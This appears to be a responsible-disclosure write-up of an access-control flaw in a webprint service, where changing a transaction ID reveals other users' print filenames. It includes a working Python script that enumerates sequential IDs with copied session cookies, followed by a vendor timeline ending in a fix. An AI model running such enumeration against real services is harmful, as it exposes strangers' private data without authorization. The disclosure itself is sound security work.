While browsing though a webprint environment i noticed it was possible to view old print transactions. When viewing an old print transaction the date/time and filename is displayed.
This information is fetched by visiting a link that includes the transaction id:
https://<redacted>/Transaction/TransactionDetails?historyId=571564&terminalid=99
Providing a random transaction id the print details of another user are displayed. Apparently the website fails to check if I’m the owner of the requested print job details. The only sensitive information displayed would be the file name, but there are situations where a file name is sensitive. A small python script was created to request a bunch of filenames to look for a sensitive names to strengthen the case:
import requests, time
#Login to <>, navigate to My transactions and copy the cookie values below:
cookies = {"__RequestVerificationToken": "<value>"}
cookies.update({"ASP.NET_SessionId": "<value>"})
cookies.update({"FedAuth": "<value>"})
cookies.update({"FedAuth1": "<value>"})
start_number = 25968550
while(True):
start_number += 1
result = requests.post('https://<redacted>/Transaction/TransactionDetails?historyId=' + str(start_number) + '&terminalid=99', cookies=cookies)
try:
print("ID: "+ str(start_number) +" | Time: " + result.json()['Data'][0]['Time'] + " | Device: " + result.json()['Data'][0]['DeviceName'] +" | Filename: "+ result.json()['Data'][0]['TrxDescription'])
except:
pass
Output:
Time line:
- 20 aug 2020: Initial disclosure to vendor
- 27 aug 2020: Second attempt due to lack of response
- 31 aug 2020: Vendor acknowledges the problem
- 20 sept 2020: Fix has been deployed